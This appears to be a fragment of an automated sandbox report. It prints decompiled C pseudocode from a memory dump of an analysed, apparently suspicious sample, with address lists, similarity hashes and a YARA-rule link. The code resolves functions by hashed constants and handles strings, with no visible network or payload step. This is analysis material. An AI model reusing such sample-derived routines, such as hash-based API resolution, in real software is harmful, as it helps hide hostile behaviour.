																		_t330 =  *_t553(0, _t573[7], _t573[0x24],  &(_t573[0x31]), _t573[0x24],  &(_t573[0x32]),  &(_t573[0x2f]));
																		__eflags = _t330;
																		if(_t330 == 0) {
																			_t558 =  *0x3db1f4; // 0x2661568
																			__eflags = _t558 - 0xc139578;
																			if(_t558 == 0xc139578) {
																				 *0x3db1f4 = 0;
																				goto L125;
																			} else {
																				__eflags = _t558;
																				if(_t558 == 0) {
																					L125:
																					_push(0xa1310f65);
																					 *_t573 = E003B7564(0xa1310f65);
																					__eflags =  *_t573;
																					if( *_t573 == 0) {
																						_t333 = E003B6C50(0xa1310f65);
																						__eflags = _t333;
																						if(_t333 != 0) {
																							_push(0xa1310f65);
																							 *_t573 = E003B7564(0xa1310f65);
																						}
																					}
																					__eflags =  *_t573;
																					if( *_t573 == 0) {
																						goto L39;
																					} else {
																						_t573 =  &(_t573[0xfffffffffffffffe]);
																						_t537 = 0xea5f6acc;
																						_t371 = E003B67C8(_t573[2], 0xea5f6acc);
																						goto L128;
																					}
																				} else {
																					__eflags = 0;
																					do {
																						_t556 = 0;
																						_t537 = 0;
																						while(1) {
																							__eflags =  *((intOrPtr*)(_t537 + _t558 + 8)) - 0xea5f6acc;
																							if( *((intOrPtr*)(_t537 + _t558 + 8)) == 0xea5f6acc) {
																								break;
																							}
																							_t556 = _t556 + 1;
																							_t537 = _t537 + 0x18;
																							__eflags = _t556 - 0x10;
																							if(_t556 < 0x10) {
																								continue;
																							} else {
																								goto L124;
																							}
																							goto L162;
																						}
																						_t371 =  *(_t537 + _t558 + 0x14);
																						__eflags = _t371;
																						if(_t371 != 0) {
																							L128:
																							__eflags = _t371;
																							if(_t371 == 0) {
																								goto L39;
																							} else {
																								asm("int3");
																								return _t371;
																							}
																						} else {
																							goto L125;
																						}
																						goto L162;
																						L124:
																						asm("o16 nop [eax+eax]");
																						_t195 = _t558 + 0x180; // 0x26890a8
																						_t558 =  *_t195;
																						__eflags = _t558;
																					} while (_t558 != 0);
																					goto L125;
																				}
																			}
																		} else {
																			L39:
																			__eflags = _t573[0x2f] - 1;
																			if(_t573[0x2f] != 1) {
																				E003B8CA0( &(_t573[0x22]));
																				E003B8CA0( &(_t573[0x20]));
																				E003C9510( &(_t573[0x24]));
																				E003B8CA0( &(_t573[0x1c]));
																				__eflags = _t573[0x1b];
																				if(_t573[0x1b] != 0) {
																					_t537 = _t573[0x1a];
																					__eflags = _t537;
																					if(_t537 == 0) {
																						L54:
																						_t338 = 1;
																					} else {
																						__eflags = _t537 - 0xffffffff;
																						if(_t537 == 0xffffffff) {
																							goto L54;
																						} else {
																							_t338 = 0;
																						}
																					}
																					__eflags = _t338;
																					if(_t338 == 0) {
																						E003CBF00(_t537);
																					}
																				}
																			} else {
																				_push(0x48);
																				_t555 = E003B1030();
																				_t575 =  &(_t573[1]);
																				__eflags = _t555;
																				if(_t555 == 0) {
																					_t555 = 0;
																					__eflags = 0;
																				} else {
																					_t87 = _t555 + 0x14; // 0x14
																					 *((intOrPtr*)(_t555 + 4)) = 0;
																					 *_t555 = 0x3da190;
																					E003B8810(_t87, 0);
																					_t89 = _t555 + 0x1c; // 0x1c
																					E003B8810(_t89, 0);
																					_t90 = _t555 + 0x24; // 0x24
																					E003B8810(_t90, 0);
																					_t91 = _t555 + 0x2c; // 0x2c
																					E003B8810(_t91, 0);
																					_t92 = _t555 + 0x34; // 0x34
																					E003B8810(_t92, 0);
																				}
																				_t94 = _t555 + 8; // 0x8
																				E003B0C10(_t94, _t575[3], 0xc);
																				_t573 =  &(_t575[3]);
																				_t96 = _t555 + 0x14; // 0x14
																				E003B8CC0(_t96, _t573[0x20]);
																				_t98 = _t555 + 0x1c; // 0x1c
																				E003B8CC0(_t98, _t573[0x22]);
																				_t100 = _t555 + 0x24; // 0x24
																				E003C0220(E003B96D0(E003C0220(_t100, _t573[0x23], 0), 0x5c), _t573[0x21], 0);
																				_t558 =  &(_t573[0xe]);
																				E003CC580( &(_t573[0x1b]), _t94,  &(_t573[0xe]), 0xf1c53a0c);
																				E003CCAE0( &(_t573[0x1b]),  &(_t573[0x10]), _t573[0xe]);
																				E003C0B10( &(_t573[0xe]));
																				_t108 = _t555 + 0x2c; // 0x2c
																				E003B96D0(E003C0220(_t108, _t573[0x11], 0), 0x5c);
																				E003B8CA0( &(_t573[0x10]));
																				E003C5C90(_t411,  &(_t573[0x12]));
																				_t112 = _t555 + 0x34; // 0x34
																				E003B8CC0(_t112, _t573[0x12]);
																				E003B8CA0( &(_t573[0x12]));
																				_push(0);
																				_push(0);
																				__eflags = E003C00B0(0,  *((intOrPtr*)(_t555 + 0x2c)), _t573[0x2a], _t555) - 1;
																				_push(0xffffffff);
																				_push(_t555);
																				 *((char*)(_t555 + 0x3c)) = 0;
																				_t537 = 0 | __eflags > 0x00000000;
																				 *((char*)(_t555 + 0x44)) = __eflags > 0;
																				 *((intOrPtr*)(_t555 + 0x40)) = 0xffffffff;
																				E003D2A00(_t573[5]);
																				E003B8CA0( &(_t573[0x22]));
																				E003B8CA0( &(_t573[0x20]));
																				E003C9510( &(_t573[0x24]));
																				E003B8CA0( &(_t573[0x1c]));
																				__eflags = _t573[0x1b];
																				if(_t573[0x1b] != 0) {
																					_t537 = _t573[0x1a];
																					__eflags = _t537;
																					if(_t537 == 0) {
																						L47:
																						_t363 = 1;
																					} else {
																						__eflags = _t537 - 0xffffffff;
																						if(_t537 == 0xffffffff) {
																							goto L47;
																						} else {
																							_t363 = 0;
																						}
																					}
																					__eflags = _t363;
																					if(_t363 == 0) {
																						E003CBF00(_t537);
																					}
																				}
																			}
																			goto L64;
																		}
																	}
																} else {
																	goto L34;
																}
																goto L162;
																L33:
																asm("o16 nop [eax+eax]");
																_t75 = _t558 + 0x180; // 0x26890a8
																_t558 =  *_t75;
																__eflags = _t558;
															} while (_t558 != 0);
															goto L34;
														}
													}
												} else {
													E003C9510( &(_t573[0x24]));
													E003B8CA0( &(_t573[0x1c]));
													__eflags = _t573[0x1b];
													if(_t573[0x1b] != 0) {
														_t537 = _t573[0x1a];
														__eflags = _t537;
														if(_t537 == 0) {
															L24:
															_t380 = 1;
														} else {
															__eflags = _t537 - 0xffffffff;
															if(_t537 == 0xffffffff) {
																goto L24;
															} else {
																_t380 = 0;
															}
														}
														__eflags = _t380;
														if(_t380 == 0) {
															E003CBF00(_t537);
														}
													}
													goto L64;
												}
												goto L162;
												L64:
												_t573[0x1a] = 0;
												_t571 = _t571 + 1;
												__eflags = _t571 - _t573[0x2a];
											} while (_t571 < _t573[0x2a]);
											_t551 = _t573[3];
											goto L66;
										}
										goto L162;
									}
									_t551 = _t573[3];
									E003B8810( &(_t573[0x29]), 0);
									goto L17;
								} else {
									asm("int3");
									return _t398;
								}
							} else {
								goto L6;
							}
							goto L162;
							L5:
							asm("o16 nop [eax+eax]");
							_t27 = _t521 + 0x180; // 0x26890a8
							_t521 =  *_t27;
						} while (_t521 != 0);
						goto L6;
					}
				}
				L162:
			}

0x003b5b60
0x003b5b60
0x003b5b61
0x003b5b62
0x003b5b63
0x003b5b64
0x003b5b6a
0x003b5b6c
0x003b5b75
0x003b5b77
0x003b5b7c
0x003b5b82
0x003b5b98
0x003b5bb3
0x003b5bca
0x003b5be5
0x003b5bfc
0x003b5c17
0x003b5c2e
0x003b5c49
0x003b5c60
0x003b5c76
0x003b5c7b
0x003b5c82
0x003b5c91
0x003b5c96
0x003b5ca2
0x003b67ae
0x00000000
0x003b5ca8
0x003b5caa
0x003b5cd7
0x003b5cdc
0x003b5ce2
0x003b5ce6
0x003b677e
0x003b6783
0x003b6785
0x003b6790
0x003b6796
0x003b6796
0x003b6785
0x003b5cee
0x00000000
0x003b5cf0
0x003b5cf7
0x003b5cfa
0x00000000
0x003b5cfa
0x003b5cac
0x003b5cac
0x003b5cac
0x003b5cae
0x003b5cb0
0x003b5cbe
0x003b5cbf
0x003b5cc5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b5cc5
0x003b679d
0x003b67a1
0x003b67a3
0x003b5cff
0x003b5d01
0x003b5d09
0x003b5d09
0x003b5d09
0x003b5d0b
0x003b5d0f
0x003b5d13
0x003b5d15
0x00000000
0x00000000
0x003b5d25
0x003b5d36
0x003b5d3b
0x003b5d4c
0x003b5d50
0x003b5d5f
0x003b5d72
0x003b5d8e
0x003b5d9c
0x003b5da3
0x003b5da8
0x003b5dae
0x003b5db4
0x003b5dce
0x003b5de3
0x003b5dea
0x003b5df6
0x003b5db6
0x003b5db8
0x003b5dc4
0x00000000
0x003b5dc4
0x003b5dfb
0x003b5e04
0x003b5e15
0x003b5e1a
0x003b5e22
0x003b6266
0x003b6266
0x003b626f
0x003b627f
0x003b6281
0x003b6287
0x003b6292
0x003b6298
0x003b66e8
0x00000000
0x003b629e
0x003b629e
0x003b62a0
0x003b62cd
0x003b62d2
0x003b62d8
0x003b62da
0x003b62dc
0x003b66b8
0x003b66bd
0x003b66bf
0x003b66ca
0x003b66d0
0x003b66d0
0x003b66bf
0x003b62e2
0x003b62e4
0x003b62f1
0x003b62f9
0x00000000
0x003b62f9
0x003b62a2
0x003b62a2
0x003b62a2
0x003b62a4
0x003b62a4
0x003b62a6
0x003b62a6
0x003b62ae
0x00000000
0x00000000
0x003b62b4
0x003b62b5
0x003b62b8
0x003b62bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b62bb
0x003b66d7
0x003b66db
0x003b66dd
0x003b62fb
0x003b62fb
0x003b62fd
0x003b6315
0x003b6317
0x003b6319
0x003b631f
0x003b6327
0x003b632f
0x003b6335
0x003b633c
0x003b6342
0x003b6349
0x003b6349
0x003b634b
0x003b6352
0x003b6354
0x003b635e
0x003b6363
0x003b6366
0x003b636c
0x003b6372
0x003b66a4
0x00000000
0x003b6378
0x003b6378
0x003b637a
0x003b63a9
0x003b63ae
0x003b63b4
0x003b63b6
0x003b63b8
0x003b666e
0x003b6671
0x003b6676
0x003b6679
0x003b667b
0x003b6686
0x003b668c
0x003b668c
0x003b667b
0x003b63be
0x003b63c0
0x003b63c9
0x003b63d1
0x00000000
0x003b63d1
0x003b637c
0x003b637c
0x003b637e
0x003b637e
0x003b6380
0x003b6382
0x003b6382
0x003b638a
0x00000000
0x00000000
0x003b6390
0x003b6391
0x003b6394
0x003b6397
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b6397
0x003b6693
0x003b6697
0x003b6699
0x003b63d3
0x003b63d3
0x003b63d5
0x003b63db
0x003b63fd
0x003b63fd
0x00000000
0x003b669f
0x00000000
0x003b669f
0x00000000
0x003b6399
0x003b6399
0x003b639f
0x003b639f
0x003b63a5
0x003b63a5
0x00000000
0x003b637e
0x003b637a
0x003b63ff
0x003b63ff
0x003b6406
0x003b640d
0x003b640f
0x003b6411
0x003b6415
0x003b6417
0x003b6419
0x003b641d
0x003b6421
0x003b6423
0x003b642b
0x003b642d
0x003b642e
0x003b6439
0x003b643e
0x003b6440
0x00000000
0x003b6442
0x003b6442
0x003b6443
0x003b644e
0x003b6453
0x003b6455
0x003b6605
0x003b6607
0x003b660b
0x003b6612
0x003b6616
0x003b661a
0x003b661d
0x00000000
0x00000000
0x00000000
0x003b6455
0x00000000
0x003b645b
0x003b645b
0x003b645c
0x003b645c
0x003b6461
0x003b6465
0x003b6465
0x003b6415
0x003b6469
0x003b6469
0x003b646a
0x003b646d
0x003b646d
0x003b6354
0x003b6327
0x003b6319
0x003b66e3
0x00000000
0x003b66e3
0x00000000
0x003b62bd
0x003b62bd
0x003b62c3
0x003b62c3
0x003b62c9
0x003b62c9
0x00000000
0x003b62a2
0x003b62a0
0x003b647a
0x003b647a
0x003b6480
0x003b6486
0x003b665a
0x00000000
0x003b648c
0x003b648c
0x003b648e
0x003b64bb
0x003b64c0
0x003b64c6
0x003b64c8
0x003b64ca
0x003b662a
0x003b662f
0x003b6631
0x003b663c
0x003b6642
0x003b6642
0x003b6631
0x003b64d0
0x003b64d2
0x00000000
0x003b64d4
0x003b64db
0x003b64de
0x00000000
0x003b64de
0x003b6490
0x003b6490
0x003b6490
0x003b6492
0x003b6492
0x003b6494
0x003b6494
0x003b649c
0x00000000
0x00000000
0x003b64a2
0x003b64a3
0x003b64a6
0x003b64a9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b64a9
0x003b6649
0x003b664d
0x003b664f
0x003b64e3
0x003b64e3
0x003b64e5
0x003b64f0
0x003b64f4
0x003b6500
0x003b650c
0x003b6515
0x003b651a
0x003b651f
0x003b6521
0x003b6525
0x003b6527
0x003b6532
0x003b6532
0x003b6529
0x003b6529
0x003b652c
0x00000000
0x003b652e
0x003b652e
0x003b652e
0x003b652c
0x003b6537
0x003b6539
0x003b653c
0x003b653c
0x003b6539
0x003b6541
0x003b654d
0x003b6565
0x003b64e7
0x003b64e7
0x003b64ee
0x003b64ef
0x003b64ef
0x003b6655
0x00000000
0x003b6655
0x00000000
0x003b64ab
0x003b64ab
0x003b64b1
0x003b64b1
0x003b64b7
0x003b64b7
0x00000000
0x003b6490
0x003b648e
0x003b5e28
0x003b5e28
0x003b5e28
0x003b5e2a
0x003b5e2e
0x003b5e35
0x003b5e42
0x003b5e44
0x003b5e46
0x003b5e50
0x003b5e66
0x003b5e6b
0x003b5e7e
0x003b5e8a
0x003b5e96
0x003b5e9b
0x003b5e9d
0x003b5ef6
0x003b5eff
0x003b5f06
0x003b5f15
0x003b5f28
0x003b5f2d
0x003b5f33
0x003b5f39
0x003b6753
0x00000000
0x003b5f3f
0x003b5f3f
0x003b5f41
0x003b5f70
0x003b5f75
0x003b5f7b
0x003b5f7f
0x003b5f84
0x003b6721
0x003b6726
0x003b6728
0x003b6733
0x003b6739
0x003b6739
0x003b6728
0x003b5f8a
0x003b5f8f
0x00000000
0x003b5f95
0x003b5f95
0x003b5f98
0x003b5fa6
0x00000000
0x003b5fa6
0x003b5f43
0x003b5f43
0x003b5f45
0x003b5f45
0x003b5f47
0x003b5f49
0x003b5f49
0x003b5f51
0x00000000
0x00000000
0x003b5f57
0x003b5f58
0x003b5f5b
0x003b5f5e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b5f5e
0x003b6742
0x003b6746
0x003b6748
0x003b5fa8
0x003b5fa8
0x003b5faa
0x003b61f8
0x003b61ff
0x003b620b
0x003b6217
0x003b6220
0x003b6225
0x003b622a
0x003b622c
0x003b6230
0x003b6232
0x003b623d
0x003b623d
0x003b6234
0x003b6234
0x003b6237
0x00000000
0x003b6239
0x003b6239
0x003b6239
0x003b6237
0x003b6242
0x003b6244
0x003b6247
0x003b6247
0x003b6244
0x00000000
0x003b5fb0
0x003b5fb7
0x003b5fbe
0x003b5fdc
0x003b5fde
0x003b5fe0
0x003b6566
0x003b656c
0x003b6572
0x003b65f9
0x00000000
0x003b6578
0x003b6578
0x003b657a
0x003b65a5
0x003b65aa
0x003b65b0
0x003b65b3
0x003b65b7
0x003b66fc
0x003b6701
0x003b6703
0x003b670e
0x003b6714
0x003b6714
0x003b6703
0x003b65bd
0x003b65c1
0x00000000
0x003b65c7
0x003b65c7
0x003b65ca
0x003b65d3
0x00000000
0x003b65d3
0x003b657c
0x003b657c
0x003b657e
0x003b657e
0x003b6580
0x003b6582
0x003b6582
0x003b658a
0x00000000
0x00000000
0x003b658c
0x003b658d
0x003b6590
0x003b6593
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b6593
0x003b65ef
0x003b65f3
0x003b65f5
0x003b65d8
0x003b65d8
0x003b65da
0x00000000
0x003b65e0
0x003b65e0
0x003b65e1
0x003b65e1
0x003b65f7
0x00000000
0x003b65f7
0x00000000
0x003b6595
0x003b6595
0x003b659b
0x003b659b
0x003b65a1
0x003b65a1
0x00000000
0x003b657e
0x003b657a
0x003b5fe6
0x003b5fe6
0x003b5fe6
0x003b5fee
0x003b61a9
0x003b61b5
0x003b61c1
0x003b61ca
0x003b61cf
0x003b61d4
0x003b61d6
0x003b61da
0x003b61dc
0x003b61e7
0x003b61e7
0x003b61de
0x003b61de
0x003b61e1
0x00000000
0x003b61e3
0x003b61e3
0x003b61e3
0x003b61e1
0x003b61ec
0x003b61ee
0x003b61f1
0x003b61f1
0x003b61ee
0x003b5ff4
0x003b5ff4
0x003b5ffb
0x003b5ffd
0x003b6000
0x003b6002
0x003b6044
0x003b6044
0x003b6004
0x003b6006
0x003b600a
0x003b600d
0x003b6013
0x003b601a
0x003b601d
0x003b6024
0x003b6027
0x003b602e
0x003b6031
0x003b6038
0x003b603b
0x003b603b
0x003b604c
0x003b6050
0x003b6055
0x003b605f
0x003b6062
0x003b606e
0x003b6071
0x003b607f
0x003b609b
0x003b60a0
0x003b60ae
0x003b60c0
0x003b60c7
0x003b60d2
0x003b60de
0x003b60e7
0x003b60f3
0x003b60fc
0x003b60ff
0x003b6108
0x003b610f
0x003b6110
0x003b6127
0x003b612a
0x003b612b
0x003b612c
0x003b612f
0x003b6136
0x003b6139
0x003b613c
0x003b6148
0x003b6154
0x003b6160
0x003b6169
0x003b616e
0x003b6173
0x003b6179
0x003b617d
0x003b617f
0x003b618a
0x003b618a
0x003b6181
0x003b6181
0x003b6184
0x00000000
0x003b6186
0x003b6186
0x003b6186
0x003b6184
0x003b618f
0x003b6191
0x003b6198
0x003b6198
0x003b6191
0x003b6173
0x00000000
0x003b5fee
0x003b5fe0
0x003b674e
0x00000000
0x003b674e
0x00000000
0x003b5f60
0x003b5f60
0x003b5f66
0x003b5f66
0x003b5f6c
0x003b5f6c
0x00000000
0x003b5f45
0x003b5f41
0x003b5e9f
0x003b5ea6
0x003b5eaf
0x003b5eb4
0x003b5eb9
0x003b5ebf
0x003b5ec3
0x003b5ec5
0x003b5ed0
0x003b5ed0
0x003b5ec7
0x003b5ec7
0x003b5eca
0x00000000
0x003b5ecc
0x003b5ecc
0x003b5ecc
0x003b5eca
0x003b5ed5
0x003b5ed7
0x003b5ede
0x003b5ede
0x003b5ed7
0x00000000
0x003b5eb9
0x00000000
0x003b624c
0x003b624c
0x003b6254
0x003b6255
0x003b6255
0x003b6262
0x00000000
0x003b6262
0x00000000
0x003b5e22
0x003b6762
0x003b676f
0x00000000
0x003b5d03
0x003b5d03
0x003b5d04
0x003b5d04
0x003b67a9
0x00000000
0x003b67a9
0x00000000
0x003b5cc7
0x003b5cc7
0x003b5ccd
0x003b5ccd
0x003b5cd3
0x00000000
0x003b5cac
0x003b5caa
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8e9921974e6b4e6c49e6fe7c2d67c93616f1c65e078f79a24a6cf12f9ac272b
Instruction ID: 1e77497cee9b7b4a269a576c5abd74b8beb29ab1af12ef3bfba6cf32d790ec78
Opcode Fuzzy Hash: c8e9921974e6b4e6c49e6fe7c2d67c93616f1c65e078f79a24a6cf12f9ac272b
Instruction Fuzzy Hash: C952C7316043019BD736EF24C852BEEB7A9AF80308F15892DE6958BA93DF34DD45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 003C7FC0, Relevance: .7, Instructions: 711
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E003C7FC0(intOrPtr* __ecx, signed int* _a4, char _a8) {
				signed int _v32;
				signed int _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _t183;
				signed int _t186;
				signed int* _t187;
				signed int* _t196;
				signed int _t197;
				signed int _t199;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				intOrPtr* _t204;
				signed int _t206;
				signed int _t207;
				signed int _t210;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t228;
				signed int _t230;
				signed int _t231;
				signed int _t237;
				signed int _t240;
				void* _t242;
				signed int _t243;
				signed int _t244;
				signed int* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t253;
				signed int _t258;
				signed int* _t259;
				signed int _t262;
				signed int _t264;
				signed int _t265;
				signed int _t271;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				intOrPtr _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int* _t291;
				signed int _t295;
				signed int* _t297;
				char _t298;
				char _t299;
				signed int _t301;
				intOrPtr* _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t307;
				void* _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t315;
				signed int _t317;
				void* _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t326;
				intOrPtr* _t329;
				intOrPtr* _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				intOrPtr* _t335;
				void* _t336;
				signed int _t337;
				unsigned int _t344;
				signed int _t346;
				void* _t347;
				signed int _t348;
				intOrPtr _t349;
				unsigned int _t354;
				signed int _t356;
				unsigned int _t361;
				signed int _t363;
				unsigned int _t368;
				intOrPtr* _t372;
				signed int _t373;
				signed int _t380;
				signed int _t382;
				signed int _t388;
				signed int _t394;
				signed int _t395;
				signed int _t397;
				void* _t399;
				void* _t401;

				_t399 = (_t397 & 0xfffffff0) - 0x34;
				_t372 = __ecx;
				_t280 =  *__ecx;
				if(_t280 != 0) {
					_t301 =  *( *( *(__ecx + 4)));
					__eflags = _t301;
					if(_t301 == 0) {
						L35:
						_push(0x40);
						_t262 = E003B1030();
						_t399 = _t399 + 4;
						__eflags =  *_t372 - 1;
						 *_t262 = 0;
						if( *_t372 <= 1) {
							goto L45;
						} else {
							_t348 = 0x40;
							goto L37;
						}
					} else {
						__eflags =  *_t301;
						if( *_t301 == 0) {
							goto L35;
						} else {
							_t240 = _t301 & 0x0000000f;
							__eflags = _t240;
							if(_t240 == 0) {
								L16:
								asm("pxor xmm0, xmm0");
								_t271 =  ~( ~_t240 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								__eflags = _t271;
								_v64 = _t271;
								_t363 = _t271;
								while(1) {
									asm("movdqu xmm1, [edx+eax]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb ebx, xmm1");
									__eflags = _t271;
									if(_t271 != 0) {
										break;
									}
									_t240 = _t240 + 0x10;
									__eflags = _t240 - _t363;
									if(_t240 < _t363) {
										continue;
									} else {
										_v64 = _t363;
										__eflags = _v64 - 0x7fffffff;
										if(_v64 >= 0x7fffffff) {
											L23:
											_v64 = 0x7fffffff;
										} else {
											_t253 = _t363;
											while(1) {
												__eflags =  *((char*)(_t253 + _t301));
												if( *((char*)(_t253 + _t301)) == 0) {
													break;
												}
												_t253 = _t253 + 1;
												__eflags = _t253 - 0x7fffffff;
												if(_t253 < 0x7fffffff) {
													continue;
												} else {
													goto L23;
												}
												goto L24;
											}
											_v64 = _t253;
										}
									}
									goto L24;
								}
								asm("bsf ebx, ebx");
								_v64 = _t271 + _t240;
							} else {
								_v64 = 0;
								_t276 = _v64;
								_t240 =  ~_t240 + 0x10;
								__eflags = _t240;
								while(1) {
									__eflags =  *((char*)(_t276 + _t301));
									if( *((char*)(_t276 + _t301)) == 0) {
										break;
									}
									_t276 = _t276 + 1;
									__eflags = _t276 - _t240;
									if(_t276 < _t240) {
										continue;
									} else {
										goto L16;
									}
									goto L24;
								}
								_v64 = _t276;
							}
							L24:
							_t242 = _v64 + 1;
							__eflags = _t242 - 0x40;
							_t243 =  <=  ? 0x40 : _t242;
							__eflags = _t243;
							if(_t243 > 0) {
								_t368 = (_t243 >> 5 >> 0x1a) + _t243 >> 6;
								_t244 = _t243 & 0x8000003f;
								__eflags = _t244;
								if(_t244 < 0) {
									_t244 = (_t244 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t244;
								}
								__eflags = _t244;
								_t348 = _t368 + (0 | _t244 > 0x00000000) << 6;
								_push(_t348);
								_v68 = _t301;
								_t247 = E003B1030();
								_t334 = _v68;
								_t297 = _t247;
								_t399 = _t399 + 4;
								_v60 = 0;
								_v48 = _t297;
								_v40 = _t372;
								 *_t297 = 0;
								_v68 =  *_t372;
								_t275 = _v60;
								_t395 = _v64;
								while(1) {
									_t249 =  *_t334;
									_t275 = _t275 + 1;
									 *_t297 = _t249;
									__eflags = _t395;
									if(_t395 == 0) {
										goto L33;
									}
									__eflags = _t275 - _t395;
									if(_t275 == _t395) {
										_t262 = _v48;
										_t250 = _v68;
										_t372 = _v40;
										_t297[0] = 0;
									} else {
										goto L33;
									}
									L173:
									__eflags = _t250 - 1;
									if(_t250 > 1) {
										goto L37;
									} else {
										goto L174;
									}
									goto L88;
									L33:
									__eflags = _t249;
									if(_t249 == 0) {
										_t262 = _v48;
										_t250 = _v68;
										_t372 = _v40;
									} else {
										_t297 =  &(_t297[0]);
										_t334 = _t334 + 1;
										__eflags = _t334;
										continue;
									}
									goto L173;
								}
							} else {
								_t262 = 0;
								__eflags = _t280 - 1;
								if(_t280 <= 1) {
									L45:
									_t302 = _a4;
									_t183 = 0;
									 *_t302 = 0;
									 *((intOrPtr*)(_t302 + 4)) = 0;
									__eflags = _t262;
									if(_t262 == 0) {
										goto L79;
									} else {
										goto L46;
									}
								} else {
									_t348 = 0;
									L37:
									_t203 = _a8;
									_t315 = 1;
									asm("pxor xmm0, xmm0");
									do {
										__eflags = _t203;
										if(_t203 == 0) {
											_v36 = _t315;
											_v40 = _t372;
										} else {
											__eflags = _t262;
											if(_t262 == 0) {
												_v36 = _t315;
												_v40 = _t372;
												L180:
												_t382 = 0;
											} else {
												_v36 = _t315;
												_v40 = _t372;
												L147:
												_t326 = _t262 & 0x0000000f;
												__eflags = _t326;
												if(_t326 == 0) {
													L151:
													asm("pxor xmm1, xmm1");
													_t388 =  ~( ~_t326 + 0x0000000f & 0x0000000f) + 0x7fffffff;
													__eflags = _t388;
													while(1) {
														asm("movdqu xmm0, [ebx+edx]");
														asm("pcmpeqb xmm0, xmm1");
														asm("pmovmskb eax, xmm0");
														__eflags = _t203;
														if(_t203 != 0) {
															break;
														}
														_t326 = _t326 + 0x10;
														__eflags = _t326 - _t388;
														if(_t326 < _t388) {
															continue;
														} else {
															__eflags = _t388 - 0x7fffffff;
															if(_t388 >= 0x7fffffff) {
																L157:
																_t382 = 0x7fffffff;
															} else {
																while(1) {
																	__eflags =  *((char*)(_t388 + _t262));
																	if( *((char*)(_t388 + _t262)) == 0) {
																		goto L188;
																	}
																	_t388 = _t388 + 1;
																	__eflags = _t388 - 0x7fffffff;
																	if(_t388 < 0x7fffffff) {
																		continue;
																	} else {
																		goto L157;
																	}
																	goto L158;
																}
																goto L188;
															}
														}
														goto L158;
													}
													asm("bsf esi, eax");
													_t382 = _t388 + _t326;
													goto L188;
												} else {
													_t382 = 0;
													_t326 =  ~_t326 + 0x10;
													__eflags = _t326;
													while(1) {
														__eflags =  *((char*)(_t382 + _t262));
														if( *((char*)(_t382 + _t262)) == 0) {
															break;
														}
														_t382 = _t382 + 1;
														__eflags = _t382 - _t326;
														if(_t382 < _t326) {
															continue;
														} else {
															goto L151;
														}
														goto L158;
													}
													L188:
													__eflags = _t382 - 0xfffffffe;
													if(_t382 == 0xfffffffe) {
														 *_t262 = 0;
													}
												}
											}
											L158:
											_t138 = _t382 + 2; // -2147483660
											_t319 = _t138;
											__eflags = _t319 - 0x40;
											_t320 =  <=  ? 0x40 : _t319;
											__eflags = _t348 - _t320;
											if(_t348 < _t320) {
												_t361 = (_t320 >> 5 >> 0x1a) + _t320 >> 6;
												_t321 = _t320 & 0x8000003f;
												__eflags = _t321;
												if(_t321 < 0) {
													_t321 = (_t321 - 0x00000001 | 0xffffffc0) + 1;
													__eflags = _t321;
												}
												__eflags = _t321;
												_t348 = _t361 + (0 | _t321 > 0x00000000) << 6;
												_push(_t348);
												_t322 = E003B1030();
												_t399 = _t399 + 4;
												__eflags = _t262;
												if(_t262 == 0) {
													 *_t322 = 0;
												} else {
													__eflags = _t322;
													if(_t322 != 0) {
														_t219 =  *_t262;
														 *_t322 = _t219;
														__eflags = _t219;
														if(_t219 != 0) {
															_v64 = _t382;
															_t220 = 0;
															__eflags = 0;
															_v32 = _t348;
															while(1) {
																_t220 = _t220 + 1;
																_t285 =  *((char*)(_t262 + _t220 * 2 - 1));
																 *(_t322 + _t220 * 2 - 1) = _t285;
																__eflags = _t285;
																if(_t285 == 0) {
																	break;
																}
																_t286 =  *((char*)(_t262 + _t220 * 2));
																 *(_t322 + _t220 * 2) = _t286;
																__eflags = _t286;
																if(_t286 != 0) {
																	continue;
																}
																break;
															}
															_t382 = _v64;
															_t348 = _v32;
														}
													}
													_push(1);
													_push(_t262);
													_v60 = _t322;
													E003B10B0();
													_t322 = _v60;
													_t399 = _t399 + 8;
												}
												_t262 = _t322;
											}
											 *((char*)(_t382 + _t262)) = _a8;
											 *((char*)(_t382 + _t262 + 1)) = 0;
											while(1) {
												L42:
												_t204 = _v40;
												_t284 = _v36;
												_t317 =  *( *( *((intOrPtr*)(_t204 + 4)) + _t284 * 4));
												__eflags = _t317;
												if(_t317 == 0) {
													goto L44;
												}
												__eflags =  *_t317;
												if( *_t317 != 0) {
													__eflags = _t317 - _t262;
													if(_t317 == _t262) {
														goto L44;
													} else {
														_t206 = _t317 & 0x0000000f;
														__eflags = _t206;
														if(_t206 == 0) {
															L94:
															asm("pxor xmm1, xmm1");
															_t394 =  ~( ~_t206 + 0x0000000f & 0x0000000f) + 0x7fffffff;
															__eflags = _t394;
															while(1) {
																asm("movdqu xmm0, [edx+eax]");
																asm("pcmpeqb xmm0, xmm1");
																asm("pmovmskb ecx, xmm0");
